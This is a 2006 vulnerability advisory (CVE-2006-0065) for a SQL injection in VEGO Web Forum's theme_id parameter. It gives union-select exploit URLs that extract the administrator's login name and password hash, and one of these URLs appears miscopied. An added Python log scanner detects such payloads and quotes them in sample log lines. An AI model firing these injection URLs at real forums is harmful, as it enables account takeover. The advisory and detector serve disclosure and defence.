Topic : VEGO Web Forum SQL Injection Vulnerability
SecurityAlert : 315
CVE : CVE-2006-0065
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : alex evuln com
Published : 07.01.2006
Affected Software : VEGO Web Forum 1.26 and earlier
Advisory Content : New eVuln Advisory:
VEGO Web Forum SQL Injection Vulnerability
--------------------Summary----------------
Vendor: VEGO
Software: VEGO Web Forum
Versions: 1.26 and earlier
Critical Level: Moderate
Type: SQL Injection
Remote: yes
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (alex (at) evuln (dot) com [email concealed])
eVuln ID: EV0001
-----------------Description--------------
Vulnerable scripts:
php/functions.php
php/functions_update.php
php/functions_display.php
The theme_id variable isn't properly sanitized before being used in a SQL
query. An attacker can use this to run any SQL query by injecting arbitrary
SQL code.
The administrator's authentication is threatened.
-------------------Exploit-----------------
Administrator's login name.
For version 1.26:
http://hostname/webforum/index.php?theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php?theme_id=-1%20union%20select%201,2,name,4%20from%20vwf_users%20where%20userid=1/*
Hash of administrator's password.
For version 1.26:
http://hostname/webforum/index.php?theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*
Earlier versions:
http://hostname/temp/_1/webforum/index.php?theme_id=-1%20union%20select%201,2,pass,4%20from%20vwf_users%20where%20userid=1/*
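Added example (not part of the original advisory and not VEGO's code): since the advisory lists no fix, a site running the forum can at least review its web server access logs for theme_id values that are not plain integers. The sketch assumes that a legitimate theme_id is a non-negative integer and that the logs use the combined format; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate theme_id is a plain non-negative integer.
VALID_THEME_ID = re.compile(r"[0-9]+")
SQL_HINTS = re.compile(r"\b(?:union|select|from|where)\b|/\*|--|'", re.I)

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jan/2006:10:00:01 +0000] "GET /webforum/index.php?theme_id=2 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [07/Jan/2006:10:00:09 +0000] "GET /webforum/index.php?theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/* HTTP/1.1" 200 4811',
    '192.0.2.77 - - [07/Jan/2006:10:00:12 +0000] "GET /webforum/index.php?theme_id=-1%2520union%2520select%25201 HTTP/1.1" 200 4790',
    '192.0.2.31 - - [07/Jan/2006:10:01:40 +0000] "GET /webforum/index.php?theme_id=abc HTTP/1.1" 200 5120',
]


def classify_theme_id(value):
    """Return 'ok', 'invalid' (not an integer) or 'sqli' (SQL syntax present)."""
    if VALID_THEME_ID.fullmatch(value):
        return "ok"
    return "sqli" if SQL_HINTS.search(value) else "invalid"


def scan_log(lines):
    """Yield (line_number, verdict, decoded_value) for suspicious theme_id values."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # keep_blank_values so an empty theme_id is reported rather than skipped.
        for value in parse_qs(query, keep_blank_values=True).get("theme_id", []):
            # parse_qs decodes once; decode again to catch double-encoded values.
            decoded = unquote(value)
            verdict = classify_theme_id(decoded)
            if verdict != "ok":
                yield number, verdict, decoded


if __name__ == "__main__":
    for number, verdict, decoded in scan_log(SAMPLE_LOG):
        print(f"line {number}: {verdict}: theme_id={decoded!r}")
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) so that requests with a non-numeric theme_id never reach the vulnerable scripts.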
--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/1/summary.html
Discovered by: Aliaksandr Hartsuyeu (alex (at) evuln (dot) com [email concealed])